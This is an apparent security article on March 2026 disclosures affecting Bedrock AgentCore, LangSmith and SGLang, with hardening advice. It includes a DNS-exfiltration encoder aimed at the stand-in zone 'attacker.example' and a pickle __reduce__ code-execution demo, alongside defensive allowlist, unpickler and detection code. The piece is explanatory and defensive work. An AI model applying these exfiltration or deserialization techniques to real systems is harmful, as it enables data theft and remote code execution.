When AI Boundaries Fail: Bedrock, LangSmith, and SGLang Raise the Stakes

Recent Bedrock AgentCore, LangSmith, and SGLang disclosures show how weak AI trust boundaries let data leakage, token theft, and remote code execution stack into a single compounding risk.
The issue is not one framework. It is boundary collapse.
Security teams often review AI incidents as separate categories: data leakage, phishing, credential theft, or remote code execution. The more useful reading of the current disclosures is that these categories can stack. When execution environments, service interfaces, and trust boundaries are weak, the same AI deployment can leak data out of one side and hand arbitrary code execution to an attacker on the other.
That is the real lesson from the March 2026 disclosures around Amazon Bedrock AgentCore, LangSmith, and SGLang: operators trusted labels and defaults more than the actual security boundary.
As of March 18, 2026, the public record shows three related risk patterns: Bedrock AgentCore documentation that leaves a DNS path open in sandbox mode, a LangSmith Studio flaw that enabled token theft, and multiple SGLang deserialization issues that turned exposed service components into code-execution paths.
Amazon Bedrock AgentCore: a sandbox label does not mean zero egress
In AWS documentation for AgentCore Code Interpreter, Sandbox mode is described as providing limited external network access, but AWS also says the interpreter can access Amazon S3 and perform DNS resolution. That is not the same thing as a sealed environment.
AWS says Sandbox mode can “perform DNS resolution.”
By contrast, AWS documents VPC mode as allowing access to private resources while maintaining network isolation from the public internet. If a workflow handles sensitive prompts, intermediate files, retrieved knowledge, or model outputs, a DNS-capable sandbox is not equivalent to an isolated enclave. A researcher disclosure framing this as a DNS-based exfiltration path is therefore consistent with the network behavior AWS documents. The exfiltration risk itself, however, is an inference from the documented capability, not a claim AWS makes in its own materials.
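To make that inference concrete, here is a minimal sketch of how DNS resolution alone can carry data out of an environment. This is illustrative, not taken from the AWS documentation or the researcher disclosure: the zone `attacker.example` is hypothetical, and no network calls are made. The payload is hex-encoded and packed into subdomain labels; each lookup delivers a chunk to whoever runs the zone's authoritative nameserver.

```python
# Sketch of DNS-based exfiltration encoding. Hypothetical: "attacker.example"
# stands in for an attacker-controlled zone; nothing here touches the network.
# DNS labels are limited to 63 bytes, so the payload is split into chunks.

def dns_exfil_queries(payload: bytes, zone: str = "attacker.example",
                      label_len: int = 60) -> list[str]:
    """Encode payload bytes as hex and pack them into DNS query names."""
    hex_data = payload.hex()
    chunks = [hex_data[i:i + label_len]
              for i in range(0, len(hex_data), label_len)]
    # Prefix each label with a sequence number so the receiver can reorder.
    return [f"{i}-{chunk}.{zone}" for i, chunk in enumerate(chunks)]

queries = dns_exfil_queries(b"api_key=sk-12345")
# Resolving each name is enough: the zone's nameserver logs the labels
# and reassembles the payload, with no HTTP egress required.
```

This is why "can perform DNS resolution" is a meaningful egress channel, and why the logging recommendation below focuses on DNS as well as conventional outbound traffic.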
For leaders, the implication is operational. If you are using Bedrock AgentCore Code Interpreter in production, network mode is a governance decision. Prefer VPC placement for sensitive workloads, apply least-privilege security group rules, avoid unnecessary outbound routes, and log network behavior. If your team cannot observe DNS activity, then claiming the sandbox is isolated is wishful thinking rather than a verified control.
LangSmith: one clicked link could become account-level access
CVE-2026-25750 shows how quickly a trusted control plane can become a breach path. The GitHub advisory published on March 3, 2026 and the NVD entry published on March 4, 2026 describe a URL parameter injection issue in LangSmith Studio affecting versions prior to 0.12.71. If an authenticated user clicked a specially crafted link, their bearer token, user ID, and workspace ID could be sent to attacker-controlled infrastructure. With the token, the attacker could impersonate the victim and perform whatever actions that user was allowed to perform in the workspace.
The advisory says credentials could be “transmitted to an attacker-controlled server.”
The tokens reportedly expired after five minutes, and the attack required social engineering. But five minutes is not a comforting window when the target system is an AI observability and evaluation platform that may sit close to prompts, datasets, traces, model settings, and integration secrets.
According to the GitHub advisory, LangSmith Cloud was patched on December 20, 2025, and self-hosted customers need version 0.12.71 or later. For teams running self-hosted LangSmith, this is a reminder that AI control planes deserve the same outbound network restrictions, origin validation, and phishing-resistant access patterns as any other privileged internal system.
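The underlying bug class is generic: a URL parameter is trusted as an API endpoint, so a crafted link can point authenticated requests, bearer token included, at an attacker's host. A defensive sketch of origin validation follows; the function name and allowlisted hosts are illustrative, not LangSmith's actual fix.

```python
from urllib.parse import urlsplit

# Illustrative allowlist; a real deployment would list its own trusted hosts.
ALLOWED_HOSTS = {"smith.langchain.com", "langsmith.internal.example"}

def validate_base_url(candidate: str) -> str:
    """Accept a base-URL parameter only if it is HTTPS and host-allowlisted."""
    parts = urlsplit(candidate)
    if parts.scheme != "https":
        raise ValueError(f"rejected scheme: {parts.scheme!r}")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"rejected host: {parts.hostname!r}")
    return candidate

validate_base_url("https://smith.langchain.com/api")   # accepted
# validate_base_url("https://evil.example/collect")    # raises ValueError
```

The key design point is that the check is an allowlist on the parsed hostname, not a substring or prefix match on the raw string, which crafted URLs can often defeat.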
SGLang: unsafe deserialization became unauthenticated RCE
CVE-2026-3059 and CVE-2026-3060 were published on March 12, 2026, and, as of NVD updates on March 17, 2026, both carry CVSS 9.8 through CISA-ADP scoring. NVD describes them as unauthenticated remote code execution flaws in SGLang components that deserialize untrusted data with pickle.loads() over exposed interfaces.
CERT/CC's vulnerability note is especially useful because it connects the mechanics to deployment reality. If the vulnerable multimodal generation or encoder parallel disaggregation features are enabled, and an attacker can reach the relevant TCP port, they may be able to send a malicious payload that is deserialized by the service. CERT explicitly warns that deployments exposed to untrusted networks are at the highest risk.
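Why pickle over a network interface amounts to code execution: the pickle format can instruct the unpickler to import and call an arbitrary callable chosen by whoever built the bytes. The harmless demonstration below uses operator.neg where a real attacker would reference os.system or similar; it is a generic illustration of the mechanism, not SGLang's actual payload.

```python
import operator
import pickle

class Payload:
    # __reduce__ tells pickle "to rebuild me, call this callable with
    # these args". Only the callable's reference (module + name) and the
    # args go into the byte stream; the victim's unpickler imports and
    # calls it. Here it is operator.neg; an attacker would choose
    # os.system or subprocess.call instead.
    def __reduce__(self):
        return (operator.neg, (7,))

malicious_bytes = pickle.dumps(Payload())

result = pickle.loads(malicious_bytes)  # executes operator.neg(7)
assert result == -7  # attacker-chosen code already ran during loads()
```

Note that the Payload class never needs to exist on the receiving side; the byte stream alone drives the execution, which is why reachability of the port is the whole attack surface.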
The related CVE-2026-3989, published on March 12, 2026 and updated in NVD on March 16, 2026, is scored 7.8 High. It affects SGLang's replay_request_dump.py utility, where a malicious .pkl file can execute code when an operator replays a crash dump. It is more constrained than the network-facing issues, but it reflects the same design pattern: trusting a format that should never be trusted.
Python's own documentation says: “Only unpickle data you trust.”
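Where a replay or debug utility must read pickle at all, the mitigation shown in the Python documentation is to subclass pickle.Unpickler and override find_class so that only an explicit allowlist of types can be constructed. A sketch, with an illustrative allowlist:

```python
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    # Only these (module, name) pairs may be resolved during unpickling;
    # the allowlist here is illustrative and would be tailored to the
    # actual dump format.
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

restricted_loads(pickle.dumps({"request": "ok"}))  # plain data passes
# restricted_loads(pickle.dumps(print))            # raises UnpicklingError
```

This narrows the attack surface rather than eliminating it; for formats an operator controls end to end, moving to JSON or another data-only serialization remains the cleaner fix.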
Orca Security's March 11 analysis adds important context. It ties all three SGLang issues to repeated unsafe pickle use and says that, at publication time, no official patch was available. CERT/CC's public note likewise says no vendor statement had been obtained during coordinated disclosure. That means operators cannot outsource immediate risk reduction to vendor responsiveness. Network segmentation, interface exposure control, and feature disablement may be the only near-term defenses.
Why these disclosures belong in one board-level conversation
These are not isolated edge cases. Bedrock highlights the danger of assuming a sandbox label guarantees isolation. LangSmith shows how a trusted AI operations surface can become a token theft path. SGLang demonstrates how model-serving infrastructure can slide from unsafe serialization into full code execution. Different products, same strategic failure: trust boundaries were looser than teams believed.
That is why this is now a leadership decision, not just a security engineering backlog item. AI platforms combine tool execution, model context, data retrieval, service accounts, and operational dashboards in the same delivery chain. When that chain is weak, confidentiality, integrity, and availability risks become one compounding blast radius.
What teams should do before production scale
- Use VPC isolation by default for code interpreters, agent runtimes, and model-serving components that touch sensitive data or internal systems.
- Enforce least-privilege IAM for execution roles, service accounts, and API credentials attached to AI workloads.
- Restrict service interface exposure so broker ports, side channels, and debugging utilities are never reachable from untrusted networks unless there is an explicit, reviewed reason.
- Upgrade LangSmith self-hosted environments to 0.12.71 or later and review whether custom integrations replicated risky URL or outbound origin assumptions.
- Disable or tightly isolate vulnerable SGLang features and treat crash-dump replay inputs as hostile unless provenance is verified.
- Log DNS and egress activity because exfiltration claims cannot be meaningfully disproved if you do not monitor the remaining outbound paths.
- Make interface review a release gate for any AI system that mixes tool use, file handling, and autonomous execution.
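For the DNS-logging item above, one cheap detection heuristic is worth sketching: flag query names whose leftmost label is unusually long or high-entropy, since hex- or base32-packed exfiltration labels look nothing like ordinary hostnames. The thresholds below are illustrative and would need tuning against real traffic.

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy, in bits per character, of a DNS label."""
    counts = Counter(label)
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_like_exfil(qname: str, max_len: int = 30,
                     max_entropy: float = 3.5) -> bool:
    """Flag a query name whose first label is long or high-entropy.
    Thresholds are illustrative, not calibrated."""
    first = qname.split(".", 1)[0]
    return len(first) > max_len or label_entropy(first) > max_entropy

looks_like_exfil("www.example.com")                 # ordinary name, not flagged
looks_like_exfil("0-6170695f6b65793d736b2d3132333435.attacker.example")  # flagged
```

A heuristic like this produces false positives (CDN hostnames, DNSSEC traffic) and is no substitute for restricting egress; it exists to make the "cannot be meaningfully disproved" point above actionable.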
Bottom line
The lesson from Bedrock AgentCore, LangSmith, and SGLang is simple: AI security is a boundary problem. If a sandbox resolves DNS, a studio link can export live tokens, or a serving component will deserialize untrusted bytes, the path from data exposure to code execution is shorter than teams assume.
A label is not a boundary; a verified control is. Teams that want to scale agents and model-serving workloads safely should harden network placement, identity scope, and service interface exposure now.


